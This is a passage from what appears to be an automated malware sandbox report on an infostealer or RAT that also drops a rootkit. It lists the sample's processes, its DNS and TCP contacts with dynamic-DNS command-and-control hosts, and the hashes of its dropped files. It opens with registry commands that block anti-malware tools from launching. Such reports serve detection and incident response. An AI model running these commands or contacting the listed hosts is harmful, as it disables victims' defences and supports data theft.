reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f
C:\Windows\system32\timeout.exe
timeout 2
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stellacy.duckdns.org | udp |
| US | 87.249.134.21:55562 | stellacy.duckdns.org | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | itroublvehacker.gq | udp |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 104.237.62.213:443 | api64.ipify.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 213.62.237.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stellacy.ydns.eu | udp |
| SE | 193.138.218.173:55562 | stellacy.ydns.eu | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stellacy.tk | udp |
| IE | 3.249.173.109:55562 | stellacy.tk | tcp |
| US | 8.8.8.8:53 | stellacy2.duckdns.org | udp |
| SE | 193.138.218.173:55562 | stellacy2.duckdns.org | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stellacy.duckdns.org | udp |
| US | 87.249.134.21:55562 | stellacy.duckdns.org | tcp |
| SE | 193.138.218.173:55562 | stellacy2.duckdns.org | tcp |
Files
C:\Users\$77main1.exe
| MD5 | 40f541872b9b1f1da056ac6d4bc90ea4 |
| SHA1 | 6e121d49311a8df04a70b6de6069460f2d55f609 |
| SHA256 | 65453a408cdcd028c8e1b091abe9397d73e2cba9708b71feac6c9ccaa497ce90 |
| SHA512 | 8456bd7ea4f898a96bd62b870f2aab466eaa4f0b0f446a108f16a9fb9ef84cd433ec9125931875138b281a9347f8ab9d99bc9d3dc54e89fb8e268f151d6dc74e |
C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat
| MD5 | ad9f604467f73ca7ddfef6f71dcf4798 |
| SHA1 | 544808b2d40f5249b65c6e1e4abcd32f3af1a896 |
| SHA256 | 7b8951b26d5ddf383a7ff37e5f2579be975d8702f7109dbc8f8393563a720ef0 |
| SHA512 | c59c1777bb07e82e35325274460adffd4b4ca216fbdc20c694ee92af772d9ce1a45ba18bd2c626083beef8e95bae82fb365414ca63100e6cc6262c2459a575f3 |
memory/2816-13-0x00007FFF6DB63000-0x00007FFF6DB65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gvvr54mu.m4x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2816-23-0x00000121A6C60000-0x00000121A6C82000-memory.dmp
memory/2816-24-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp
memory/2816-25-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp
memory/2816-28-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp
C:\Users\$77Redownloader.exe
| MD5 | 067d274dc271710cb8afd7c0680958fe |
| SHA1 | 4282104ec316c3452a81afc623c61ed348331436 |
| SHA256 | c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051 |
| SHA512 | 3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
| MD5 | 9d972046c0e663416177f42d19f38e35 |
| SHA1 | 23aeec718eed2be8adf5380311fc787db03bfc43 |
| SHA256 | ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4 |
| SHA512 | 25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat
| MD5 | 73336bee4fa2b1c3751fa012c9333a79 |
| SHA1 | 2cc55d9440ed3c17e6b05466c10334b0d3ef0408 |
| SHA256 | 435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2 |
| SHA512 | 8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
| MD5 | b7062a62e271b7dd402b7406f8a611ad |
| SHA1 | 952cbd23fd41cbc40d17c988de946ec983d262de |
| SHA256 | d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c |
| SHA512 | 2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867 |
memory/4748-52-0x0000000000700000-0x0000000000708000-memory.dmp
memory/4748-54-0x000000001B240000-0x000000001B2DE000-memory.dmp
memory/3228-55-0x00000000004F0000-0x00000000007EE000-memory.dmp
memory/3228-56-0x0000000005700000-0x0000000005CA4000-memory.dmp
memory/3228-57-0x0000000005300000-0x0000000005366000-memory.dmp
memory/4748-58-0x000000001B1D0000-0x000000001B1E2000-memory.dmp
memory/4748-61-0x000000001B3E0000-0x000000001B41C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
| MD5 | 88ab0bb59b0b20816a833ba91c1606d3 |
| SHA1 | 72c09b7789a4bac8fee41227d101daed8437edeb |
| SHA256 | f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312 |
| SHA512 | 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857 |
memory/4720-74-0x000001E7DA5C0000-0x000001E7DA89A000-memory.dmp
memory/4720-75-0x000001E7F4F90000-0x000001E7F52D2000-memory.dmp
memory/4720-76-0x000001E7DAE40000-0x000001E7DAE46000-memory.dmp
memory/4720-77-0x000001E7DC6A0000-0x000001E7DC716000-memory.dmp
memory/4720-78-0x000001E7F4E40000-0x000001E7F4EF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\config
| MD5 | 1ba367d0f9aac0f650e65ab7401776c0 |
| SHA1 | 75cf3295125cfaa0c247ebccc57e63f915198683 |
| SHA256 | 68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03 |
| SHA512 | 45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c |
memory/4720-110-0x000001E7DAF20000-0x000001E7DAF50000-memory.dmp
memory/4720-112-0x000001E7F4EF0000-0x000001E7F4F0A000-memory.dmp
memory/4720-113-0x000001E7F4F10000-0x000001E7F4F42000-memory.dmp
memory/4720-111-0x000001E7DAF50000-0x000001E7DAF5C000-memory.dmp
memory/4720-114-0x000001E7F5DC0000-0x000001E7F5E62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
| MD5 | 964c5fffcba7f353cf12d09675a46de6 |
| SHA1 | 9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9 |
| SHA256 | b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed |
| SHA512 | ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565 |
memory/1252-127-0x00000000014A0000-0x00000000014D6000-memory.dmp
memory/1252-128-0x00000000041E0000-0x0000000004808000-memory.dmp
memory/1252-129-0x0000000003D00000-0x0000000003D22000-memory.dmp
memory/1252-130-0x0000000003DA0000-0x0000000003E06000-memory.dmp
memory/1252-149-0x0000000004810000-0x0000000004B64000-memory.dmp
memory/4720-150-0x000001E7DC760000-0x000001E7DC768000-memory.dmp
memory/1252-151-0x0000000004DB0000-0x0000000004DCE000-memory.dmp
memory/1252-152-0x0000000005310000-0x000000000535C000-memory.dmp
memory/4720-156-0x000001E7F6060000-0x000001E7F607E000-memory.dmp
memory/2728-159-0x000001D3D6B70000-0x000001D3D6BAE000-memory.dmp
memory/2728-163-0x00007FFF8B2E0000-0x00007FFF8B39E000-memory.dmp
memory/2728-160-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp
memory/3480-164-0x0000000140000000-0x0000000140040000-memory.dmp
memory/3480-167-0x00007FFF8B2E0000-0x00007FFF8B39E000-memory.dmp
memory/3480-166-0x00007FFF8BCB0000-0x00007FFF8BEA5000-memory.dmp
memory/3480-165-0x0000000140000000-0x0000000140040000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\compile.vbs
| MD5 | ca906422a558f4bc9e471709f62ec1a9 |
| SHA1 | e3da070007fdeae52779964df6f71fcb697ffb06 |
| SHA256 | abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee |
| SHA512 | 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b |
memory/1252-171-0x0000000006660000-0x0000000006CDA000-memory.dmp
memory/1252-172-0x00000000052D0000-0x00000000052EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\compile.bat
| MD5 | 808099bfbd62ec04f0ed44959bbc6160 |
| SHA1 | f4b6853d958c2c4416f6e4a5be8a11d86f64c023 |
| SHA256 | f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8 |
| SHA512 | e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0 |
memory/4764-178-0x0000000000400000-0x0000000000434000-memory.dmp
memory/4764-177-0x0000000000400000-0x0000000000434000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
| MD5 | 053778713819beab3df309df472787cd |
| SHA1 | 99c7b5827df89b4fafc2b565abed97c58a3c65b8 |
| SHA256 | f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe |
| SHA512 | 35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb |
memory/4764-181-0x0000000000400000-0x0000000000434000-memory.dmp
memory/4632-188-0x00000000021D0000-0x00000000021EC000-memory.dmp
memory/3256-194-0x00000000024A0000-0x00000000024C2000-memory.dmp
memory/3256-196-0x000000006F730000-0x000000006F740000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
| MD5 | 2538ec9e8425a905937573069b77d4c2 |
| SHA1 | ad0c2b7aff4382e23444d26adac96d9697b849f3 |
| SHA256 | 29338949fae4c88a972837aae898529e4c7a2c4df35982eef2f8d7b602c17f4e |
| SHA512 | a867a471b837b9c662528ee7a5904e8fe7b1eebb277b8a7fe4d4caf423fae914baf692bb5004c02ddb539b157d63326178467e28b03aa92a533cda19155d501c |
memory/3256-201-0x0000000000400000-0x000000000047C000-memory.dmp
memory/3256-200-0x00000000024A0000-0x00000000024C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\compile.bat
| MD5 | eb51755b637423154d1341c6ee505f50 |
| SHA1 | d71d27e283b26e75e58c0d02f91d91a2e914c959 |
| SHA256 | db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9 |
| SHA512 | e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5 |
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
| MD5 | a776e68f497c996788b406a3dc5089eb |
| SHA1 | 45bf5e512752389fe71f20b64aa344f6ca0cad50 |
| SHA256 | 071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1 |
| SHA512 | 02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073 |
memory/4388-214-0x0000000000400000-0x000000000045B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
| MD5 | 0d8360781e488e250587a17fbefa646c |
| SHA1 | 29bc9b438efd70defa8fc45a6f8ee524143f6d04 |
| SHA256 | ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64 |
| SHA512 | 940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e |
memory/4348-218-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4348-222-0x000000006F730000-0x000000006F740000-memory.dmp
memory/4348-227-0x00000000006E0000-0x0000000000702000-memory.dmp
memory/4348-230-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hh.exe
| MD5 | 4d4c98eca32b14aeb074db34cd0881e4 |
| SHA1 | 92f213d609bba05d41d6941652a88c44936663a4 |
| SHA256 | 4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f |
| SHA512 | 959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf |
memory/4348-221-0x00000000006E0000-0x0000000000702000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cookies3
| MD5 | fd1cd719731a16bb2c7d4e7ff2ad0032 |
| SHA1 | 9b7bbc8f369c8a9b854696e1c3188224789b7c0b |
| SHA256 | b5101ea84e30f9a33db887c27cfeb7b8344ad0e8f93e0f2cd52329443d5d4613 |
| SHA512 | 9d264dc1efaaff1303362d5686759de58ecdb4ae99f49f0b8319c54f063230ea1dfb53bfc3e618b82aaf816b994ccb89a0e4a25b7d734f2f624ac70f539850d0 |
C:\Users\Admin\AppData\Local\Temp\Cookies1
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/3480-240-0x0000000140000000-0x0000000140040000-memory.dmp
memory/668-247-0x00000108BDD10000-0x00000108BDD3A000-memory.dmp
memory/380-253-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/380-252-0x0000019C64790000-0x0000019C647BA000-memory.dmp
memory/920-261-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/1156-273-0x0000012E87050000-0x0000012E8707A000-memory.dmp
memory/1156-274-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/1132-271-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/1132-270-0x0000028413960000-0x000002841398A000-memory.dmp
memory/996-268-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/996-267-0x0000017A49660000-0x0000017A4968A000-memory.dmp
memory/920-260-0x000002588E6A0000-0x000002588E6CA000-memory.dmp
memory/736-258-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/736-257-0x000001D726B90000-0x000001D726BBA000-memory.dmp
memory/668-248-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/612-244-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp
memory/612-243-0x000001C7E7CA0000-0x000001C7E7CCA000-memory.dmp
memory/612-242-0x000001C7E7860000-0x000001C7E7883000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\compile.bat
| MD5 | 91128da441ad667b8c54ebeadeca7525 |
| SHA1 | 24b5c77fb68db64cba27c338e4373a455111a8cc |
| SHA256 | 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873 |
| SHA512 | bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd |
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
| MD5 | df991217f1cfadd9acfa56f878da5ee7 |
| SHA1 | 0b03b34cfb2985a840db279778ca828e69813116 |
| SHA256 | deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112 |
| SHA512 | 175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316 |
C:\Users\Admin\AppData\Local\Temp\xwizard.cfg
| MD5 | ae8eed5a6b1470aec0e7fece8b0669ef |
| SHA1 | ca0e896f90c38f3a8bc679ea14c808726d8ef730 |
| SHA256 | 3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e |
| SHA512 | e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6 |
C:\Users\Admin\AppData\Local\Temp\bhvE85C.tmp
| MD5 | 05832cd24a350bd56653c6b8e5c3261b |
| SHA1 | 732ac434acbb0435e1b19dc2c5083b325d0fd682 |
| SHA256 | 7e211d358d3429e4cdb9c7c6b1a5178d3f7874769dfc4c7d2b5d345e518b2e60 |
| SHA512 | 0fd73d72feb4fc99894e00529992b0af85b26ba73b0afef689a9b996ca172e809cb0344c56364aa3f727394e950895e6b9ec58590c9e12427d221aed6396e579 |
C:\Users\Admin\AppData\Local\Temp\whysosad
| MD5 | fc3c88c2080884d6c995d48e172fbc4f |
| SHA1 | cb1dcc479ad2533f390786b0480f66296b847ad3 |
| SHA256 | 1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664 |
| SHA512 | 4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll
| MD5 | f876b8ce91d572547ea79104f3f24f48 |
| SHA1 | a154133be4547d099f4aefb9a5abbd55b02649be |
| SHA256 | c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c |
| SHA512 | f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll
| MD5 | ecfb232ae47a07667a5850104ebebe26 |
| SHA1 | 53db1507d46209797cad3d4029964cdfea708d8e |
| SHA256 | 6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a |
| SHA512 | 6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77Stellacy.exe.log
| MD5 | 2362dcc9d262d0969898b143fb7fc91a |
| SHA1 | 2240860a675c86425f5702b501eac121bfb744eb |
| SHA256 | 4f7cff601d97caf1e0040bc2d63ccadd27294b2e551ff4167e0b080c69a915b0 |
| SHA512 | 59cb7e53dc9cc02f25216cc87115403ed67fb5d24947ef2e803cd54e9f118d5d65a71817b05642c238ca48eb7bfd228d008d92e42023f2c15755c64c88f5b0d6 |